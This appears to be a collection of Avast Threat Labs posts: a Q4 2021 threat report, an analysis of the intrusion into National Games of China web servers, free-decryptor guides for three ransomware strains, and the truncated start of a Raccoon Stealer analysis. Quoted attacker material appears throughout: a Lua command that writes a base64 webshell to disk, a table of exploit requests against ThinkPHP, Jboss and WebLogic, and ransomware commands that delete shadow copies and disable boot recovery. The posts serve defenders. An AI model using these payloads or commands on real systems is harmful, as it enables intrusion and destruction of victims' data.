A hot topic this quarter was a vulnerability in Log4j and in addition to other malware types, some RATs were also spread thanks to the vulnerability. The most prevalent were NanoCore, AsyncRat and Orcus. Another new vulnerability that was exploited by RATs was CVE-2021-40449. This vulnerability was used to elevate permissions of malicious processes by exploiting the Windows kernel driver. Attackers used this vulnerability to download and launch the MistarySnail RAT. Furthermore, a very important cause of high Nanocore and AsyncRat detections was caused by a malicious campaign abusing the cloud providers, Microsoft Azure and Amazon Web Service (AWS). In this campaign malware attackers used Azure and AWS as download servers for their malicious payloads.

But that’s not all, at the beginning of December we found a renamed version of DcRat under the name SantaRat. This renamed version was just pure copy-paste of DcRat, but it shows that malware developers were also in the Christmas spirit and maybe they also hoped that their version of Santa would visit many households as well, to deliver their gift. To be clear, DcRat is a slightly modified version of AsyncRat. 

The developers of DcRat weren’t the only ones playing the role of Santa and distributing gifts. Many other malware authors also delivered RAT related gifts to us in Q4’21.

The first one was the DarkWatchman RAT, written in JavaScript and on top of the programming language used, it differs from other RATs with one other special property: it lives in the system registry keys. This means that it uses registry keys to store its code, as well as to store temporary data, thus making it fileless.

Another RAT that appeared was ActionRAT, released by the SideCopy APT group in an attack on the government of Afghanistan. This RAT uses base64 encoding to obfuscate its strings and C&C domains. Its capabilities are quite simple, but still powerful so it could execute commands from a C&C server, upload, download and execute files, and retrieve the victim’s machine details.

We also observed two new RATs spread on Linux systems. CronRAT's name already tells us what it uses under the hood, but for what? This RAT uses cron jobs, which are basically scheduled tasks on Linux systems to store payloads. These tasks were scheduled on 31.2. (a non-existent date) and that’s why they were not triggered, so the payload could remain hidden. The second RAT from the Linux duo was NginRAT which was found on servers that were previously infected with CronRAT and served the same purpose: to provide remote access to the compromised systems.

Even though we saw a decrease in RAT activity at the end of December it won’t stay that way. Malicious actors will likely come back from their vacations fresh and will deliver new surprises. So stay tuned.

Samuel Sidor, Malware Researcher


We have recorded a significant increase in rootkit activity at Q4’21, illustrated in the chart below. This phenomenon can be explained by the increase in adware activity since the most active rootkit was the Cerbu rootkit. The primary function of Cerbu is to hijack browser homepages and redirect site URLs according to the rootkit configuration. So, this rootkit can be easily deployed and configured for adware.

The graph below shows that China is still the most at risk countries in terms of protected users, although attacks in China decreased by about 17%.

In Q4’21, the most significant increase of risk ratio was in Egypt and Vietnam. On the other hand, Taiwan, Hong Kong, and China reported approximately the same values as in the previous quarter. The most protected users were in the Czech Republic, Russian Federation, China, and Indonesia.

Martin Chlumecký, Malware Researcher

Technical support scams (TSS)

During the last quarter, we registered a significant wave of increased tech support scam activity. In Q4’21, we saw peaks at the end of December and we are already seeing some active spikes in January.

Activity of a long-term TSS campaign

The top targeted countries for this campaign are the United States, Brazil, and France. The activity of this campaign shows the tireless effort of the scammers and proves the increasing popularity of this threat.

In combination with other outgoing long-term campaigns, our data also shows two high spikes of activity of another campaign, lasting no longer than a few days, heavily targeting the United States and Canada, as well as other countries in Europe. This campaign had its peak at the end of November and the beginning of December, then it slowly died out.

Rise and fall and slow fall of the second campaign

Example of a typical URL for this short campaign:



We also noticed attempts at innovation as new variants of TSS samples appeared. So, not just a typical locked browser with error messages but other imitations like Amazon Prime, and PayPal. We are of course tracking these new variants and will see how popular they will be in the next quarter.

Overall TSS activity for Q4

Alexej Savčin, Malware Analyst

Vulnerabilities and Exploits

As was already mentioned in the foreword, the vulnerability news in Q4’21 was dominated by Log4Shell. This vulnerability in Log4j – a seemingly innocent Java logging utility – took the infosec community by storm. It was extremely dangerous because of the ubiquity of Log4j and the ease of exploitation, which was made even easier by several PoC exploits, ready to be weaponized by all kinds of attackers. The root of the vulnerability was an unsafe use of JNDI lookups, a vulnerability class that Hewlett Packard researchers Alvaro Muñoz and Oleksandr Mirosh already warned about in their 2016 BlackHat talk. Nevertheless, the vulnerability existed in Log4j from 2013 until 2021, for a total of eight years.

For the attackers, Log4Shell was the greatest thing ever. They could just try to stuff the malicious string into whatever counts as user input and observe if it gets logged somewhere by a vulnerable version of Log4j. If it does, they just gained remote code execution in the absence of any mitigations. For the defenders on the other hand, Log4Shell proved to be a major headache. They had to find all the software in their organization that is (directly or indirectly) using the vulnerable utility and then patch it or mitigate it. And they had to do it fast, before the attackers managed to exploit something in their infrastructure. To make things even worse, this process had to be iterated a couple of times, because even some of the patched versions of Log4j turned out not to be that safe after all.

From a research standpoint, it was interesting to observe the way the exploit was adopted by various attackers. First, there were only probes for the vulnerability, abusing the JNDI DNS service provider. Then, the first attackers started exploiting Log4Shell to gain remote code execution using the LDAP and RMI service providers. The JNDI strings in-the-wild also became more obfuscated over time, as the attackers started to employ simple obfuscation techniques in an attempt to evade signature-based detection. As time went on, more and more attackers exploited the vulnerability. In the end, it was used to push all kinds of malware, ranging from simple coinminers to sophisticated APT implants.

In other vulnerability news, we continued our research into browser exploit kits. In October, we found that Underminer implemented an exploit for CVE-2021-21224 to join Magnitude in attacking unpatched Chromium-based browsers. While Magnitude stopped using its Chromium exploit chain, Underminer is still using it with a moderate level of success. We published a detailed piece of research about these Chromium exploit chains, so make sure to read it if you’d like to know more.

Jan Vojtěšek, Malware Researcher

Web skimming 

One of the top affected countries by web skimming in Q4’21 was Saudi Arabia, in contrast with Q3’21 we protected four times as many users in Saudi Arabia in Q4. It was caused by an infection of e-commerce sites souqtime[.]com and swsg[.]co. The latter loads malicious code from dev-connect[.]com[.]de. This domain can be connected to other known web skimming domains via common IP 195[.]54[.]160[.]61. The malicious code responsible for stealing credit card details loads only on the checkout page. In this particular case, it is almost impossible for the customer to recognize that the website is compromised, because the attacker steals the payment details from the existing payment form. The payment details are then sent to the attackers website via POST request with custom encoding (multiple base64 and substitution). The data sending is triggered on an “onclick” event and every time the text from all input fields is sent.

In Australia the most protected users were visitors of mobilitycaring[.]com[.]au. During Q4’21 this website was sending payment details to two different malicious domains, first was stripe-auth-api[.]com, and later the attacker changed it to booctstrap[.]com. This domain is typosquatting mimicking This is not the first case we observed where an attacker changed the exfiltration domain during the infection.

In Q4’21, we protected nearly twice as many users in Greece as in Q3’21. The reason behind this was the infected site retro23[.]gr, unlike the infected site from Saudi Arabia (swsg[.]co), in this case the payment form is not present on the website, therefore the attacker inserted their own. But as we can see in the image below, that form does not fit into the design of the website. This gives customers the opportunity to notice that something is wrong and not fill in their payment details. We published a detailed analysis about web skimming attacks, where you can learn more.

Pavlína Kopecká, Malware Analyst


Premium SMS – UltimaSMS

Scams that siphon victims’ money away through premium SMS subscriptions have resurfaced in the last few months. Available on the Play Store, they mimic legitimate applications and games, often featuring catchy adverts. Once downloaded, they prompt the user to enter their phone number to access the app. Unbeknownst to the user, they are then subscribed to a premium SMS service that can cost up to $10 per week.

As users often aren’t inherently familiar with how recurring SMS subscriptions work, these scams can run for months unnoticed and cause an expensive phone bill for the victims. Uninstalling the app doesn’t stop the subscription, the victim has to contact their provider to ensure the subscription is properly canceled, adding to the hassle these scams create.

Avast has identified one such family of Premium SMS scams – UltimaSMS. These applications serve only to subscribe victims to premium SMS subscriptions and do not have any further functions. The actors behind UltimaSMS extensively used social media to advertise their applications and accrued over 10M downloads as a result.

According to our data the most targeted countries were those in the Middle East, like Qatar, Oman, Saudi Arabia or Kuwait. Although we’ve seen instances of these threats active even in other areas, like Europe, for instance in our home country – the Czech Republic. We attribute this widespread reach of UltimaSMS to its former availability on the Play Store and localized social media advertisements.

Jakub Vávra, Malware Analyst

Spyware – Facestealer

A newcomer this year, Facestealer, resurfaced on multiple occasions in Q4’21. It is a spyware that injects JavaScript into the inbuilt Android Webview browser in order to steal Facebook credentials. Masquerading as photo editors, horoscopes, fitness apps and others, it has been a continued presence in the last few months of 2021 and it appears to be here to stay. 

Facestealer apps look legitimate at first and they fulfill their described app functions. After a period of time, the apps’ C&C server sends a command to prompt the user to sign in to Facebook to continue using the app, without adverts. Users may have their guard down as they’ve used the app without issue up until now. The app loads the legitimate Facebook login website and injects malicious JS code to skim the users’ login credentials. The user may be unaware their social media account has been breached.

It is likely that, as with other spyware families we’ve seen in the past, Facestealer will be reused in order to target other social media platforms or even banks. The mechanism used in the initial versions can be adjusted as the attackers can load login pages from potentially any platform.

According to our threat data, this threat was mostly targeting our users in Africa and surrounding islands – Niger and Nigeria in the lead, followed by Madagascar, Zimbabwe and others.

Jakub Vávra, Malware Analyst
Ondřej David, Malware Analysis Team Lead

Fake Covid themed apps on the decline

Despite the pandemic raging on and governments implementing various new measures and introducing new applications such as Covid Passports, there’s been a steady decline in the number of fake Covid apps. Various bankers, spyware and trojans that imitated official Covid apps flooded the mobile market during 2020 and first half of 2021, but it seems they have now returned to disguising themselves as delivery apps, utility apps and others that we have seen before.

It’s possible that users aren’t as susceptible to fake Covid apps anymore or that the previous methods of attack proved more efficient for these pieces of malware, as evidenced for example on the massively successful campaigns of FluBot, which we reported on previously. Cerberus/Alien variants stood out as the bankers that were on the frontlines of fake Covid-themed apps. But similarly to some of this year’s newcomers such as FluBot or Coper bankers, the focus has now shifted back to the “original” attempts to breach users’ phones through SMS phishing while pretending to be a delivery service app, bank app or others.

During the beginning of the pandemic we were able to collect hundreds to thousands of new unique samples monthly disguising themselves as various apps connected to providing Covid information, Covid passes, vaccination proofs or contact tracing apps or simply just inserting the Covid/Corona/Sars keywords in their names or icons. During the second half of 2021 this trend has been steadily dropping. In Q4’21 we have seen only low 10s of such new samples.

Jakub Vávra, Malware Analyst
Ondřej David, Malware Analysis Team Lead

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alex Savčin
  • Anh Ho
  • Daniel Beneš
  • Igor Morgenstern
  • Jakub Kaloč
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Rubín
  • Jan Vojtěšek
  • Luigino Camastra
  • Martin Hron
  • Martin Chlumecký
  • Michal Salát
  • Ondřej David
  • Pavlína Kopecká 
  • Samuel Sidor
Data analysts
  • Pavol Plaskoň
  • Stefanie Smith

The post Avast Q4/21 Threat report appeared first on Avast Threat Labs.

Analysis of Attack Against National Games of China Systems


On September 15, 2021 the National Games of China began in the Chinese city of Shaanxi. It is an event similar if not identical to the Olympics, but only hosts athletes from China. Earlier in September, our colleague David Álvarez found a malware sample with a suspicious file extension of a picture and decided to investigate where it came from. Later, he also found a report of the incident from the National Games IT team on VirusTotal stating that the attack occurred before the Games started. Attached to the report were access logs from the web-server and SQL database. By analyzing these logs, we gathered initial information about the attack. These logs only include request path, and sadly do not reveal content of POST requests much needed to fully understand what commands attackers sent to their web shells, but even with this limited information we were able to outline the attack and determine the initial point of intrusion with moderate confidence.

In this posting, we are sharing our own research on the incident, the samples and the exploits used by the attackers, detailing what appears to be a successful breach of systems hosting content for the National Games prior to the event. We based our research on publicly accessible information about the incident. The analyzed samples were already present on VirusTotal.

Based on the initial information from the report and our own findings, it appears the breach was successfully resolved prior to the start of the games. We are unable to detail what actions the attackers may have taken against the broader network. We also are unable to make any conclusive attribution of the attackers, though have reason to believe they are either native Chinese-language speakers or show high fluency in Chinese.

Gaining access

The evidence indicates that the attackers gained initial code execution at around 10:00AM local time on September 3, 2021 and installed their first reverse shell executing scripts called runscript.lua. We suspect that the way this happened is via an arbitrary file-read exploit targeting either route.lua which, according to the API (Application User Interface) extracted from various JavaScript files, is a LUA script containing a lot of functionality from handling login authentication to manipulation of files or index.lua in combination with index.lua?a=upload API that was not used by anyone else in the rest of the network log. It’s also worth noting that runscript.lua was not mentioned in the report or included in the attacker uploaded files.

After gaining initial access the attackers uploaded several other reverse shells such as conf.lua, miss1.php or admin2.php (see table 2 for source code) to gain a more permanent foothold in the network in case one of the shells got discovered. These reverse shells get commands via a POST request, thus the data is not present in the logs attached with the report as they only contain the URL path.

In the screenshot we can see that the attackers were getting a lot of data returned to them from the backdoors (highlighted)

Even more so the logs in the report don’t contain full information about the network traffic such that we could with certainty determine how and when the attackers gained their first web shell. We estimated our findings by looking for a point in time from which they uploaded and interacted with the first custom web shell we can find.

What they did there

The attackers started doing some tests on what they were able to upload to the server. From August 26, 2021 to September 9, 2021 the attackers tried submitting files with different file-types and also file extensions. For instance, they submitted the same legitimate image ( 7775b6a45da80c1a8a0f8e044c34be823693537a0635327b967cc8bff3cb349a) with different file extensions: ico, lua, js, luac, txt, html and rar.

After gaining knowledge on blocked and allowed file types, they tried to submit executable code. Of course, they started submitting PoCs instead of directly executing a webshell because submitting PoCs is more stealthy and also allows one to gain knowledge on what the malicious code is allowed to do. For instance, one of the files uploaded was this Lua script camouflaged as an image (20210903-160250-168571-ab1c20.jpg):


Taking advantage of the Lua io.popen function, which executes a command and returns process output, the attackers used variants of the following command camouflaged as images to test different webshells:

io.popen("echo 'Base64EncodedWebshell' |base64 -d  > ../mod/remote/miss.php")

They tested different Chinese webshells (i.e. Godzilla webshell), but this information is not enough to confidently attribute the attack to any threat actor.

The attackers decided to reconfigure the web server by uploading their own www.conf file camouflaged as a PNG file consisting of a default configuration but allowing the .lua extension to be executed. We suspect that the server was configured to execute new threads in a thread pool which didn’t work for Rebeyond Behinder (a powerful Chinese webshell) they wanted to execute. They were not able to successfully reconfigure the server to execute it. So, as final payload, they uploaded and ran an entire Tomcat server properly configured and weaponized with Rebeyond Behinder.

It is important to mention that they were able to upload some tools (dnscrypt-proxy, fscan, mssql-command-tool, behinder) to the server and execute a network scanner (fscan) and a custom one-click exploitation framework that we want to discuss below in more detail.

The aforementioned Chinese scanner and exploitation framework is written in Go programming language and distributed as a single binary, which allows to execute all the steps of exploitation by simply feeding it with an IP or a range of IPs (those can be passed as arguments to the program or using a text file) which makes of it an excellent tool to quickly hack computer systems belonging a network environment.

The tool is well organized. It is structured with plugins that allow it to perform all the necessary steps to autonomously hack other devices within the same network.

  1. Plugins/Web/Finger: Performs a fingerprint to recognize services. Currently, it supports the following fingerprints: IBM, Jboss, shiro, BIG-IP, RuiJie, Tomcat, Weaver, jeecms, seeyon, shterm, tongda, zentao, Ueditor, ioffice, outlook, yongyou, Coremail, easysite, FCKeditor, Fortigate, FineReport, SangforEDR, Springboot, thinkphp_1, thinkphp_2, thinkphp_3, thinkphp_4, easyConnect and weblogic_async.
  2. Plugins/Service: Attacks services in order to get access to it. Currently, it supports the following services: ssh, smb, redis, mysql, mssql, ms17010 (EternalBlue SMB exploit) and ftp.
  3. Plugins/PwdTxt: Lists of both, username and password, short dictionaries for each service in Plugins/Service allowing to perform a brief brute force attack on the service.
  4. Plugins/Web/Poc: Modules to exploit common web applications. Currently, it supports the following exploits: Jeecms_SSRF1, yongyou_rce1, RuiJie_RCE1, outlook_ews, thinkphp_RCE1, thinkphp_RCE2, thinkphp_RCE3, thinkphp_RCE4, thinkphp_RCE5, thinkphp_RCE6, RuiJie_Upload1, Weaver_Upload1, yongyou_upload1, weblogic_console, phpstudy_backdoor, yongyou_readFile1, Jboss_unAuthConsole, Jboss_CVE_2017_12149, weblogic_CVE_2019_2618.

An example of a Plugin is plugins/Web/Poc/Weblogic_CVE_2019_2618

In the left side of the following screenshot you can see a scan executed in our lab, targeting a Python server (terminal in the right side of the screenshot) with the exploit payload request highlighted in a red rectangle.

For more information on the payloads, please, refer to IoCs, Table 2.


The procedure followed by the attackers hacking the 14th National Games of China is not new at all. They gained access to the system by exploiting a vulnerability in the web server. This shows the need for updating software, configuring it properly and also being aware of possible new vulnerabilities in applications by using vulnerability scanners.

The most fundamental security countermeasure for defenders consists in keeping the infrastructure up-to-date in terms of patching. Especially for the Internet facing infrastructure.

Prevention should be the first priority for both internal and Internet facing infrastructure.

Webshells are a post exploitation tool that can be very difficult to detect. Some webshells don’t even touch the filesystem residing only in memory; this can make it even harder to detect and identify. After implanting, webshells are mostly identified via unusual network traffic or anomalous network traffic indicators.

To protect against this kind of attack, it is important to deploy more layers of protection (i.e. SELinux, Endpoint Detection and Response solutions and so on) such that you can detect and quickly act when a successful intrusion happens.

After gaining access, the attackers tried to move through the network using exploits and bruteforcing services in an automated way. Since getting to this point is very possible for attackers, defenders must be prepared. Real Time monitoring of computer systems and networks is the right way to do that.

Finally, the attackers used an exploitation framework written in the Go programming language to move through the network. Go is a programming language becoming more and more popular which can be compiled for multiple operating systems and architectures, in a single binary self-containing all dependencies. So we expect to see malware and grey tools written in this language in future attacks, especially in IoT attacks where a broad variety of devices leveraging different kinds of processor architectures are involved.


SHA + original filename Description
Encrypted ZIP file
Shellcode dropper
Single line shellcode
Rebeyond shellcode dropper
Shellcode dropper
UPX compressed Mssql Toolkit
FScan for Linux
Custom exploitation framework
Rebeyond Behinder webshell
UPX Compressed DNS Proxy for Linux
Table 1
Proof of concept Payload
Yongyou_upload1 Request GET /aim/equipmap/accept.jsp
ThinkPHP_RCE4 Request POST /index.php?s=/Index/\\think\\app/invokefunction
Data function=call_user_func_array&vars[0]=base64_encode&vars[1][]=123456
ThinkPHP_RCE5 Request POST /index.php?s=/Index/\\think\\app/invokefunction
Data function=call_user_func_array&vars[0]=base64_encode&vars[1][]=123456
ThinkPHP_RCE6 Request POST /public/?s=captcha/MTIzNDU2
Data _method=__construct&filter[]=print_r&method=GET&s=1
yongyou_rce1 Request GET /service/monitorservlet
RuiJie_Upload1 Request GET /ddi/server/fileupload.php
Weaver_Upload1 Request GET /page/exportImport/uploadOperation.jsp
phpstudy backdoor Request GET /
Headers User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36
Accept-Encoding: gzip,deflate
ThinkPHP_RCE2 Request GET /index.php?s=index/think\\request/input?data=123456&filter=base64_encode
yongyou_readFile1 Request GET /NCFindWeb?service=&filename=
Request GET /bea_wls_deployment_internal/DeploymentService
Outlook ews (Interface blasting) Request GET /ews
ThinkPHP_RCE1 Request GET /index.php?s=index/\\think\\app/invokefunction&function=
ThinkPHP_RCE3 Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
CVE_2020_14882 Request GET /console/
Jboss JMXInvokerServlet (Deserialization) Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
Jboss (Unauthorized access to the console) Request GET /jmx-console/index.jsp
Jboss JMXInvokerServlet (Deserialization) Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
jeecms SSRF to Upload Request GET /ueditor/getRemoteImage.jspx?upfile=
RuiJie_RCE1 Request GET /guest_auth/guestIsUp.php
Table 2


  • miss1.php
  • conf.lua
  • admin2.php

IoC repository

Files and IoCs are in our IoC repository

The post Analysis of Attack Against National Games of China Systems appeared first on Avast Threat Labs.

Decrypted: TargetCompany Ransomware

7 February 2022 at 15:02

On January 25, 2022, a victim of a ransomware attack reached out to us for help. The extension of the encrypted files and the ransom note indicated the TargetCompany ransomware (not related to Target the store), which can be decrypted under certain circumstances.

Modus Operandi of the TargetCompany Ransomware

When executed, the ransomware does some actions to ease its own malicious work:

  1. Assigns the SeTakeOwnershipPrivilege and SeDebugPrivilege for its process
  2. Deletes special file execution options for tools like vssadmin.exe, wmic.exe, wbadmin.exe, bcdedit.exe, powershell.exe, diskshadow.exe, net.exe and taskkil.exe
  3. Removes shadow copies on all drives using this command:
    %windir%\sysnative\vssadmin.exe delete shadows /all /quiet
  4. Reconfigures boot options:
    bcdedit /set {current} bootstatuspolicy ignoreallfailures
    bcdedit /set {current} recoveryenabled no
  5. Kills some processes that may hold open valuable files, such as databases:
List of processes killed by the TargetCompany ransomware
MsDtsSrvr.exe ntdbsmgr.exe
ReportingServecesService.exe oracle.exe
fdhost.exe sqlserv.exe
fdlauncher.exe sqlservr.exe
msmdsrv.exe sqlwrite

After these preparations, the ransomware gets the mask of all logical drives in the system using the  GetLogicalDrives() Win32 API. Each drive is checked for the drive type by GetDriveType(). If that drive is valid (fixed, removable or network), the encryption of the drive proceeds. First, every drive is populated with the ransom note file (named RECOVERY INFORMATION.txt). When this task is complete, the actual encryption begins.


To keep the infected PC working, TargetCompany avoids encrypting certain folders and file types:

List of folders avoided by the TargetCompany ransomware
msocache boot Microsoft Security Client Microsoft MPI
$windows.~ws $windows.~bt Internet Explorer Windows Kits
system volume information mozilla Reference Microsoft.NET
intel boot Assemblies Windows Mail
appdata windows.old Windows Defender Microsoft Security Client
perflogs Windows Microsoft ASP.NET Package Store
application data
WindowsPowerShell Core Runtime Microsoft Analysis Services
tor browser Windows NT Package Windows Portable Devices
Windows Store Windows Photo Viewer
Common Files Microsoft Help Viewer Windows Sidebar

List of file types avoided by the TargetCompany ransomware
.386 .cpl .exe .key .msstyles .rtp
.adv .cur .hlp .lnk .msu .scr
.ani .deskthemepack .hta .lock .nls .shs
.bat .diagcfg .icl .mod .nomedia .spl
.cab .diagpkg .icns .mpa .ocx .sys
.cmd .diangcab .ico .msc .prf .theme
.com .dll .ics .msi .ps1 .themepack
.drv .idx .msp .rom .wpx

The ransomware generates an encryption key for each file (0x28 bytes). This key splits into Chacha20 encryption key (0x20 bytes) and n-once (0x08) bytes. After the file is encrypted, the key is protected by a combination of Curve25519 elliptic curve + AES-128 and appended to the end of the file. The scheme below illustrates the file encryption. Red-marked parts show the values that are saved into the file tail after the file data is encrypted:

The exact structure of the file tail, appended to the end of each encrypted file, is shown as a C-style structure:

Every folder with an encrypted file contains the ransom note file. A copy of the ransom note is also saved into c:\HOW TO RECOVER !!.TXT

The personal ID, mentioned in the file, is the first six bytes of the personal_id, stored in each encrypted file.

How to use the Avast decryptor to recover files

To decrypt your files, please, follow these steps:

  1. Download the free Avast decryptor. Choose a build that corresponds with your Windows installation. The 64-bit version is significantly faster and most of today’s Windows installations are 64-bit.
  2. Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next”
  1. On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
  1. On the third page, you need to enter the name of a file encrypted by the TargetCompany ransomware. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
  1. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During password cracking, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you an option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
  1. When the password is found, you can proceed to the decryption of files on your PC by clicking “Next”.
  1. On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.


SHA256 File Extension
98a0fe90ef04c3a7503f2b700415a50e62395853bd1bab9e75fbe75999c0769e .mallox
3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673 .exploit
af723e236d982ceb9ca63521b80d3bee487319655c30285a078e8b529431c46e .architek
e351d4a21e6f455c6fca41ed4c410c045b136fa47d40d4f2669416ee2574124b .brg

The post Decrypted: TargetCompany Ransomware appeared first on Avast Threat Labs.

Help for Ukraine: Free decryptor for HermeticRansom ransomware

3 March 2022 at 09:07

On February 24th, the Avast Threat Labs discovered a new ransomware strain accompanying the data wiper HermeticWiper malware,  which our colleagues at ESET found circulating in the Ukraine. Following this naming convention, we opted to name the strain we found piggybacking on the wiper, HermeticRansom. According to analysis done by Crowdstrike’s Intelligence Team, the ransomware contains a weakness in the crypto schema and can be decrypted for free.

If your device has been infected with HermeticRansom and you’d like to decrypt your files, click here to skip to the How to use the Avast decryptor to recover files


The ransomware is written in GO language. When executed, it searches local drives and network shares for potentially valuable files, looking for  files with one of the extensions listed below (the order is taken from the sample):

.docx .doc .dot .odt .pdf .xls .xlsx .rtf .ppt .pptx .one.xps .pub .vsd .txt .jpg .jpeg .bmp .ico .png .gif .sql.xml .pgsql .zip .rar .exe .msi .vdi .ova .avi .dip .epub.iso .sfx .inc .contact .url .mp3 .wmv .wma .wtv .avi .acl.cfg .chm .crt .css .dat .dll .cab .htm .html .encryptedjb

In order to keep the victim’s PC operational, the ransomware avoids encrypting files in Program Files and Windows folders.

For every file designated for encryption, the ransomware creates a 32-byte encryption key. Files are encrypted by blocks, each block has 1048576 (0x100000) bytes. A maximum of nine blocks are encrypted. Any data past 9437184 bytes (0x900000) is left in plain text. Each block is encrypted by AES GCM symmetric cipher. After data encryption, the ransomware appends a file tail, containing the RSA-2048 encrypted file key. The public key is stored in the binary as a Base64 encoded string:

Encrypted file names are given extra suffix:

.[[email protected]].encryptedJB

When done, a file named “read_me.html” is saved to the user’s Desktop folder:

There is an interesting amount of politically oriented strings in the ransomware binary. In addition to the file extension, referring to the re-election of Joe Biden in 2024, there is also a reference to him in the project name:

During the execution, the ransomware creates a large amount of child processes, that do the actual encryption:

How to use the Avast decryptor to recover files

To decrypt your files, please, follow these steps:

  1. Download the free Avast decryptor.
  2. Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next
  1. On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
  1. On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.


SHA256: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382

The post Help for Ukraine: Free decryptor for HermeticRansom ransomware appeared first on Avast Threat Labs.

Decrypted: Prometheus Ransomware

9 March 2022 at 11:02

Avast Releases Decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.

Skip to how to use the Prometheus ransomware decryptor

How Prometheus Works

Prometheus tries to thwart malware analysis by killing various processes like packet sniffing, debugging or tools for inspecting PE files. Then, it generates a random password that is used during the Salsa20 encryption. 

Prometheus looks for available local drives to encrypt files that have one of the following  extensions:

db dbf accdb dbx mdb mdf epf ndf ldf 1cd sdf nsf fp7 cat log dat txt jpeg gif jpg png php cs cpp rar zip html htm xlsx xls avi mp4 ppt doc docx sxi sxw odt hwp tar bz2 mkv eml msg ost pst edb sql odb myd php java cpp pas asm key pfx pem p12 csr gpg aes vsd odg raw nef svg psd vmx vmdk vdi lay6 sqlite3 sqlitedb java class mpeg djvu tiff backup pdf cert docm xlsm dwg bak qbw nd tlg lgb pptx mov xdw ods wav mp3 aiff flac m4a csv sql ora dtsx rdl dim mrimg qbb rtf 7z 

Encrypted files are given a new extension .[ID-<PC-ID>].unlock. After the encryption process is completed, Notepad is executed with a ransom note from the file UNLOCK_FILES_INFO.txt informing victims on how to pay the ransom if they want to decrypt their files.

How to use the Avast decryptor to decrypt files encrypted by Prometheus Ransomware

To decrypt your files, follow these steps:

  1. Download the free Avast decryptor.
  2. Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
  1. On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
  1. On the third page, you need to provide a file in its original form and encrypted by the Prometheus ransomware. Enter both names of the files. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
  1. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During the password cracking process, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you the option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
  1. When the password is found, you can proceed to decrypt all encrypted files on your PC by clicking “Next”.
  1. On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.


SHA256 File Extension
742bc4e78c36518f1516ece60b948774990635d91d314178a7eae79d2bfc23b0 .[ID-<HARDWARE_ID>].unlock

The post Decrypted: Prometheus Ransomware appeared first on Avast Threat Labs.

Raccoon Stealer: “Trash panda” abuses Telegram

9 March 2022 at 13:48

We recently came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses. 

Raccoon Stealer is a password stealer capable of stealing not just passwords, but various types of data, including:

  • Cookies, saved logins and forms data from browsers
  • Login credentials from email clients and messengers
  • Files from crypto wallets
  • Data from browser plugins and extension
  • Arbitrary files based on commands from C&C

In addition, it’s able to download and execute arbitrary files by command from its C&C. In combination with active development and promotion on underground forums, Raccoon Stealer is prevalent and dangerous.

The oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019. Its authors have stated the same month as the start of selling the malware on underground forums. Since then, it has been updated many times. According to its authors, they fixed bugs, added features, and more.


We’ve seen Raccoon distributed via downloaders: Buer Loader and GCleaner. According to some samples, we believe it is also being distributed in the form of fake game cheats, patches for cracked software (including hacks and mods for Fortnite, Valorant, and NBA2K22), or other software. Taking into account that Raccoon Stealer is for sale, it’s distribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while some are protected using Themida or malware packers. Worth noting is that some samples were packed more than five times in a row with the same packer! 

Technical details

Raccoon Stealer is written in C/C++ and built using Visual Studio. Samples have a size of about 580-600 kB. The code quality is below average, some strings are encrypted, some are not.

Once executed, Racoon Stealer starts checking for the default user locale set on the infected device and won’t work if it’s one of the following:

  • Russian
  • Ukrainian
  • Belarusian
  • Kazakh
  • Kyrgyz
  • Armenian
  • Tajik
  • Uzbek

C&C communications

The most interesting thing about this stealer is its communication with C&Cs. There are four values crucial for its C&C communication, which are hardcoded in every Raccoon Stealer sample:

  • MAIN_KEY. This value has been changed four times during the year.
  • URLs of Telegram gates with channel name. Gates are used not to implement a complicated Telegram protocol and not to store any credentials inside samples
  • BotID – hexadecimal string, sent to the C&C every time
  • TELEGRAM_KEY – a key to decrypt the C&C address obtained from Telegram Gate

Let’s look at an example to see how it works:
